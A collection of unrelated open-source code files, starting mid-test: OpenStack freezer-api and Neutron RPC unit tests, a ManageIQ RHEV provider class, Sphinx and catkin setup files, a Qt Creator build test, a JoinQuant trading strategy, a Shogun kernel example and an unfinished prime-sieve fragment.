freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_0.get('action'))
self.assertEqual(freezer_action.get('backup_name'),
self.freezer_action_0.get('backup_name'))
self.assertEqual(freezer_action.get('container'),
self.freezer_action_0.get('container'))
self.assertEqual(freezer_action.get('path_to_backup'),
self.freezer_action_0.get('path_to_backup'))
self.assertEqual(freezer_action.get('mode'),
self.freezer_action_0.get('mode'))
def test_add_and_delete_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
result = self.dbapi.delete_action(project_id=self.fake_project_id,
user_id=self.fake_action_0.
get('user_id'),
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_0.
get('user_id'),
action_id=action_id)
self.assertEqual(len(result), 0)
def test_add_and_update_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
patch_doc = copy.deepcopy(self.fake_action_2)
result = self.dbapi.update_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
patch_doc=patch_doc,
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=action_id)
self.assertEqual(result.get('max_retries'),
self.fake_action_2.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_2.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_2.get('action'))
def test_add_and_replace_action(self):
action_doc = copy.deepcopy(self.fake_action_0)
action_id = self.dbapi.add_action(user_id=self.fake_action_0.
get('user_id'),
doc=action_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(action_id)
patch_doc = copy.deepcopy(self.fake_action_2)
result = self.dbapi.replace_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
doc=patch_doc,
action_id=action_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=action_id)
self.assertEqual(result.get('max_retries'),
self.fake_action_2.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_2.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_2.get('action'))
patch_doc1 = copy.deepcopy(self.fake_action_0)
result = self.dbapi.replace_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
doc=patch_doc1,
action_id=self.fake_action_id)
self.assertIsNotNone(result)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=self.fake_action_id)
self.assertEqual(result.get('action_id'), self.fake_action_id)
def test_add_and_search_action(self):
count = 0
actionids = []
while(count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=10,
offset=0)
self.assertIsNotNone(result)
self.assertEqual(len(result), 10)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(actionids[index], actionmap['action_id'])
def test_action_list_with_search_match_and_match_not(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not': [{'mode': 'nova'}],
'match': [{'max_retries': 10}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'max_retries': 10},
{'mode': 'nova'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('nova',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_not_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not':
[{'mode': 'nova'},
{'max_retries': 5}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_with_all_opt_one_match(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'_all': '[{"max_retries": 10}]'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 5)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
def test_action_list_with_search_with_all_opt_two_matchs(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match':
[{'_all':
'[{"max_retries": 10}, '
'{"mode": "nova"}]'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('nova',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_with_error_all_opt_return_alltuples(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'_all': '{"max_retries": 10}'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 20)
search_opt = {'match': [{'_all': 'max_retries=10'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 20)
@patch('freezer_api.db.sqlalchemy.api.get_action')
def test_raise_add_action(self, mock_get_action):
mock_get_action.return_value = mock.MagicMock()
self.assertRaises(freezer_api_exc.DocumentExists,
self.dbapi.add_action, self.fake_user_id,
self.fake_action_0,
project_id=self.fake_project_id)
| openstack/freezer-api | freezer_api/tests/unit/sqlalchemy/v2/test_action.py | Python | apache-2.0 | 19,604 | 0 |
import attr
from widgetastic.widget import View, Text
from widgetastic_patternfly import Tab, Input, BootstrapSwitch, Button
from wrapanapi.rhevm import RHEVMSystem
from cfme.common.candu_views import VMUtilizationView
from cfme.common.provider import CANDUEndpoint, DefaultEndpoint, DefaultEndpointForm
from cfme.common.provider_views import BeforeFillMixin
from cfme.exceptions import ItemNotFound
from cfme.services.catalogs.catalog_items import RHVCatalogItem
from cfme.utils import version
from widgetastic_manageiq import LineChart
from . import InfraProvider
class RHEVMEndpoint(DefaultEndpoint):
@property
def view_value_mapping(self):
tls_since_version = '5.8.0.8'
return {'hostname': self.hostname,
'api_port': getattr(self, 'api_port', None),
'verify_tls': version.pick({
version.LOWEST: None,
tls_since_version: getattr(self, 'verify_tls', None)}),
'ca_certs': version.pick({
version.LOWEST: None,
tls_since_version: getattr(self, 'ca_certs', None)})
}
class RHEVMEndpointForm(View):
@View.nested
class default(Tab, DefaultEndpointForm, BeforeFillMixin): # NOQA
TAB_NAME = 'Default'
api_port = Input('default_api_port')
verify_tls = BootstrapSwitch(id='default_tls_verify')
ca_certs = Input('default_tls_ca_certs')
@View.nested
class candu(Tab, BeforeFillMixin): # NOQA
TAB_NAME = 'C & U Database'
hostname = Input('metrics_hostname')
api_port = Input('metrics_api_port')
database_name = Input('metrics_database_name')
username = Input('metrics_userid')
password = Input('metrics_password')
confirm_password = Input('metrics_verify')
change_password = Text(locator='.//a[normalize-space(.)="Change stored password"]')
validate = Button('Validate')
class RHEVMVMUtilizationView(VMUtilizationView):
"""A VM Utilization view for rhevm providers"""
vm_cpu = LineChart(id='miq_chart_parent_candu_0')
vm_memory = LineChart(id='miq_chart_parent_candu_1')
vm_disk = LineChart(id='miq_chart_parent_candu_2')
vm_network = LineChart(id='miq_chart_parent_candu_3')
@attr.s(hash=False)
class RHEVMProvider(InfraProvider):
catalog_item_type = RHVCatalogItem
vm_utilization_view = RHEVMVMUtilizationView
type_name = "rhevm"
mgmt_class = RHEVMSystem
db_types = ["Redhat::InfraManager"]
endpoints_form = RHEVMEndpointForm
discover_dict = {"rhevm": True}
settings_key = 'ems_redhat'
# xpath locators for elements, to be used by selenium
_console_connection_status_element = '//*[@id="connection-status"]|//*[@id="message-div"]'
_canvas_element = '(//*[@id="remote-console"]/canvas|//*[@id="spice-screen"]/canvas)'
_ctrl_alt_del_xpath = '//*[@id="ctrlaltdel"]'
_fullscreen_xpath = '//*[@id="fullscreen"]'
bad_credentials_error_msg = "Credential validation was not successful"
ems_events = [
('vm_create', {'event_type': 'USER_ADD_VM_FINISHED_SUCCESS', 'vm_or_template_id': None}),
('vm_stop', {'event_type': 'USER_STOP_VM', 'vm_or_template_id': None}),
('vm_start', {'event_type': 'USER_RUN_VM', 'vm_or_template_id': None}),
('vm_delete', {'event_type': 'USER_REMOVE_VM_FINISHED', 'vm_or_template_id': None})
]
@property
def view_value_mapping(self):
return {
'name': self.name,
'prov_type': 'Red Hat Virtualization'
}
def deployment_helper(self, deploy_args):
""" Used in utils.virtual_machines """
if 'default_cluster' not in deploy_args:
return {'cluster': self.data['default_cluster']}
return {}
@classmethod
def from_config(cls, prov_config, prov_key):
endpoints = {}
for endp in prov_config['endpoints']:
for expected_endpoint in (RHEVMEndpoint, CANDUEndpoint):
if expected_endpoint.name == endp:
endpoints[endp] = expected_endpoint(**prov_config['endpoints'][endp])
if prov_config.get('discovery_range'):
start_ip = prov_config['discovery_range']['start']
end_ip = prov_config['discovery_range']['end']
else:
start_ip = end_ip = prov_config.get('ipaddress')
return cls.appliance.collections.infra_providers.instantiate(
prov_class=cls,
name=prov_config['name'],
endpoints=endpoints,
zone=prov_config.get('server_zone', 'default'),
key=prov_key,
start_ip=start_ip,
end_ip=end_ip)
# Following methods will only work if the remote console window is open
# and if selenium focused on it. These will not work if the selenium is
# focused on Appliance window.
def get_console_connection_status(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._console_connection_status_element).text
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
def get_remote_console_canvas(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._canvas_element)
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
def get_console_ctrl_alt_del_btn(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._ctrl_alt_del_xpath)
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
def get_console_fullscreen_btn(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._fullscreen_xpath)
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
| lkhomenk/integration_tests | cfme/infrastructure/provider/rhevm.py | Python | gpl-2.0 | 6,107 | 0.003111 |
#!/usr/bin/env python3
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup(
packages=['lg_keyboard'],
package_dir={'': 'src'},
scripts=[],
requires=[]
)
setup(**d)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| EndPointCorp/lg_ros_nodes | lg_keyboard/setup.py | Python | apache-2.0 | 309 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# clamm documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 2 20:47:20 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../clamm'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.napoleon']
napoleon_numpy_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'clamm'
copyright = '2017, Paul Adams'
author = 'Paul Adams'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'clammdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'clamm.tex', 'clamm Documentation',
'Paul Adams', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'clamm', 'clamm Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'clamm', 'clamm Documentation',
author, 'clamm', 'One line description of project.',
'Miscellaneous'),
]
| p5a0u9l/clamm | doc/conf.py | Python | mit | 4,816 | 0.000208 |
#############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
source("../../shared/qtcreator.py")
import re
SpeedCrunchPath = ""
def buildConfigFromFancyToolButton(fancyToolButton):
beginOfBuildConfig = "<b>Build:</b> "
endOfBuildConfig = "<br/><b>Deploy:</b>"
toolTipText = str(fancyToolButton.toolTip)
beginIndex = toolTipText.find(beginOfBuildConfig) + len(beginOfBuildConfig)
endIndex = toolTipText.find(endOfBuildConfig)
return toolTipText[beginIndex:endIndex]
def main():
if not neededFilePresent(SpeedCrunchPath):
return
startApplication("qtcreator" + SettingsPath)
if not startedWithoutPluginError():
return
suitableKits = Targets.DESKTOP_480_GCC
if platform.system() in ('Windows', 'Microsoft'):
suitableKits |= Targets.DESKTOP_480_MSVC2010
checkedTargets = openQmakeProject(SpeedCrunchPath, suitableKits)
progressBarWait(30000)
fancyToolButton = waitForObject(":*Qt Creator_Core::Internal::FancyToolButton")
availableConfigs = iterateBuildConfigs(len(checkedTargets), "Release")
if not availableConfigs:
test.fatal("Haven't found a suitable Qt version (need Release build) - leaving without building.")
for kit, config in availableConfigs:
selectBuildConfig(len(checkedTargets), kit, config)
buildConfig = buildConfigFromFancyToolButton(fancyToolButton)
if buildConfig != config:
test.fatal("Build configuration %s is selected instead of %s" % (buildConfig, config))
continue
test.log("Testing build configuration: " + config)
if not JIRA.isBugStillOpen(13700):
invokeMenuItem("Build", "Run qmake")
waitForCompile()
invokeMenuItem("Build", "Rebuild All")
waitForCompile(300000)
checkCompile()
checkLastBuild()
# Add a new run configuration
invokeMenuItem("File", "Exit")
def init():
global SpeedCrunchPath
SpeedCrunchPath = os.path.join(srcPath, "creator-test-data", "speedcrunch", "src", "speedcrunch.pro")
cleanup()
def cleanup():
# Make sure the .user files are gone
cleanUpUserFiles(SpeedCrunchPath)
for dir in glob.glob(os.path.join(srcPath, "creator-test-data", "speedcrunch", "speedcrunch-build-*")):
deleteDirIfExists(dir)
| kuba1/qtcreator | tests/system/suite_general/tst_build_speedcrunch/test.py | Python | lgpl-2.1 | 3,768 | 0.008493 |
import shipane_sdk
# 初始化函数,设定要操作的股票、基准等等
def initialize(context):
# 定义一个全局变量, 保存要操作的股票
# 000001(股票:平安银行)
g.security = '000001.XSHE'
# 设定沪深300作为基准
set_benchmark('000300.XSHG')
def process_initialize(context):
# 创建 StrategyManager 对象
# 参数为配置文件中的 manager id
g.__manager = shipane_sdk.JoinQuantStrategyManagerFactory(context).create('manager-1')
# 每个单位时间(如果按天回测,则每天调用一次,如果按分钟,则每分钟调用一次)调用一次
def handle_data(context, data):
# 保存 order 对象
order_ = order(g.security, 100)
# 实盘易依据聚宽的 order 对象下单
g.__manager.execute(order_)
order_ = order(g.security, -100)
g.__manager.execute(order_)
# 撤单
g.__manager.cancel(order_)
| Pyangs/ShiPanE-Python-SDK | examples/joinquant/simple_strategy.py | Python | mit | 911 | 0.001473 |
# Copyright (c) 2015 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
import testtools
from neutron.api.rpc.callbacks import resources
from neutron.api.rpc.handlers import resources_rpc
from neutron.common import topics
from neutron import context
from neutron.objects import base as objects_base
from neutron.tests import base
def _create_test_dict():
return {'id': 'uuid',
'field': 'foo'}
def _create_test_resource(context=None):
resource_dict = _create_test_dict()
resource = FakeResource(context, **resource_dict)
resource.obj_reset_changes()
return resource
@obj_base.VersionedObjectRegistry.register
class FakeResource(objects_base.NeutronObject):
fields = {
'id': obj_fields.UUIDField(),
'field': obj_fields.StringField()
}
@classmethod
def get_objects(cls, context, **kwargs):
return list()
class ResourcesRpcBaseTestCase(base.BaseTestCase):
def setUp(self):
super(ResourcesRpcBaseTestCase, self).setUp()
self.context = context.get_admin_context()
class _ValidateResourceTypeTestCase(base.BaseTestCase):
def setUp(self):
super(_ValidateResourceTypeTestCase, self).setUp()
self.is_valid_mock = mock.patch.object(
resources_rpc.resources, 'is_valid_resource_type').start()
def test_valid_type(self):
self.is_valid_mock.return_value = True
resources_rpc._validate_resource_type('foo')
def test_invalid_type(self):
self.is_valid_mock.return_value = False
with testtools.ExpectedException(
resources_rpc.InvalidResourceTypeClass):
resources_rpc._validate_resource_type('foo')
class _ResourceTypeVersionedTopicTestCase(base.BaseTestCase):
@mock.patch.object(resources_rpc, '_validate_resource_type')
def test_resource_type_versioned_topic(self, validate_mock):
obj_name = FakeResource.obj_name()
expected = topics.RESOURCE_TOPIC_PATTERN % {
'resource_type': 'FakeResource', 'version': '1.0'}
with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
return_value=FakeResource):
observed = resources_rpc.resource_type_versioned_topic(obj_name)
self.assertEqual(expected, observed)
class ResourcesPullRpcApiTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPullRpcApiTestCase, self).setUp()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
mock.patch('neutron.api.rpc.callbacks.resources.get_resource_cls',
return_value=FakeResource).start()
self.rpc = resources_rpc.ResourcesPullRpcApi()
mock.patch.object(self.rpc, 'client').start()
self.cctxt_mock = self.rpc.client.prepare.return_value
def test_is_singleton(self):
self.assertIs(self.rpc, resources_rpc.ResourcesPullRpcApi())
def test_pull(self):
expected_obj = _create_test_resource(self.context)
resource_id = expected_obj.id
self.cctxt_mock.call.return_value = expected_obj.obj_to_primitive()
result = self.rpc.pull(
self.context, FakeResource.obj_name(), resource_id)
self.cctxt_mock.call.assert_called_once_with(
self.context, 'pull', resource_type='FakeResource',
version=FakeResource.VERSION, resource_id=resource_id)
self.assertEqual(expected_obj, result)
def test_pull_resource_not_found(self):
resource_dict = _create_test_dict()
resource_id = resource_dict['id']
self.cctxt_mock.call.return_value = None
with testtools.ExpectedException(resources_rpc.ResourceNotFound):
self.rpc.pull(self.context, FakeResource.obj_name(),
resource_id)
class ResourcesPullRpcCallbackTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPullRpcCallbackTestCase, self).setUp()
self.callbacks = resources_rpc.ResourcesPullRpcCallback()
self.resource_obj = _create_test_resource(self.context)
def test_pull(self):
resource_dict = _create_test_dict()
with mock.patch.object(
resources_rpc.prod_registry, 'pull',
return_value=self.resource_obj) as registry_mock:
primitive = self.callbacks.pull(
self.context, resource_type=FakeResource.obj_name(),
version=FakeResource.VERSION,
resource_id=self.resource_obj.id)
registry_mock.assert_called_once_with(
'FakeResource', self.resource_obj.id, context=self.context)
self.assertEqual(resource_dict,
primitive['versioned_object.data'])
self.assertEqual(self.resource_obj.obj_to_primitive(), primitive)
@mock.patch.object(FakeResource, 'obj_to_primitive')
def test_pull_no_backport_for_latest_version(self, to_prim_mock):
with mock.patch.object(resources_rpc.prod_registry, 'pull',
return_value=self.resource_obj):
self.callbacks.pull(
self.context, resource_type=FakeResource.obj_name(),
version=FakeResource.VERSION,
resource_id=self.resource_obj.id)
to_prim_mock.assert_called_with(target_version=None)
@mock.patch.object(FakeResource, 'obj_to_primitive')
def test_pull_backports_to_older_version(self, to_prim_mock):
with mock.patch.object(resources_rpc.prod_registry, 'pull',
return_value=self.resource_obj):
self.callbacks.pull(
self.context, resource_type=FakeResource.obj_name(),
version='0.9', # less than initial version 1.0
resource_id=self.resource_obj.id)
to_prim_mock.assert_called_with(target_version='0.9')
class ResourcesPushRpcApiTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPushRpcApiTestCase, self).setUp()
mock.patch.object(resources_rpc.n_rpc, 'get_client').start()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
self.rpc = resources_rpc.ResourcesPushRpcApi()
self.cctxt_mock = self.rpc.client.prepare.return_value
self.resource_obj = _create_test_resource(self.context)
def test__prepare_object_fanout_context(self):
expected_topic = topics.RESOURCE_TOPIC_PATTERN % {
'resource_type': resources.get_resource_type(self.resource_obj),
'version': self.resource_obj.VERSION}
with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
return_value=FakeResource):
observed = self.rpc._prepare_object_fanout_context(
self.resource_obj)
self.rpc.client.prepare.assert_called_once_with(
fanout=True, topic=expected_topic)
self.assertEqual(self.cctxt_mock, observed)
def test_pushy(self):
with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
return_value=FakeResource):
self.rpc.push(
self.context, self.resource_obj, 'TYPE')
self.cctxt_mock.cast.assert_called_once_with(
self.context, 'push',
resource=self.resource_obj.obj_to_primitive(),
event_type='TYPE')
class ResourcesPushRpcCallbackTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPushRpcCallbackTestCase, self).setUp()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
mock.patch.object(
resources_rpc.resources,
'get_resource_cls', return_value=FakeResource).start()
self.resource_obj = _create_test_resource(self.context)
self.resource_prim = self.resource_obj.obj_to_primitive()
self.callbacks = resources_rpc.ResourcesPushRpcCallback()
@mock.patch.object(resources_rpc.cons_registry, 'push')
def test_push(self, reg_push_mock):
self.callbacks.push(self.context, self.resource_prim, 'TYPE')
reg_push_mock.assert_called_once_with(self.resource_obj.obj_name(),
self.resource_obj, 'TYPE')
| javaos74/neutron | neutron/tests/unit/api/rpc/handlers/test_resources_rpc.py | Python | apache-2.0 | 8,869 | 0.000338 |
#!/usr/bin/env python
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
parameter_list = [[traindat,testdat,2,10], [traindat,testdat,5,10]]
def kernel_anova_modular (train_fname=traindat,test_fname=testdat,cardinality=2, size_cache=10):
from modshogun import ANOVAKernel,RealFeatures,CSVFile
feats_train=RealFeatures(CSVFile(train_fname))
feats_test=RealFeatures(CSVFile(test_fname))
kernel=ANOVAKernel(feats_train, feats_train, cardinality, size_cache)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train, km_test, kernel
if __name__=='__main__':
print('ANOVA')
kernel_anova_modular(*parameter_list[0])
| c4goldsw/shogun | examples/undocumented/python_modular/kernel_anova_modular.py | Python | gpl-3.0 | 717 | 0.041841 |
from math import sqrt
def main():
n = int(input("Enter n : "))
boolArr = [True for i in range(n + 1)]
boolArr[0] = boolArr[1] = False
for i in range(2, int(sqrt(n) + 1)):
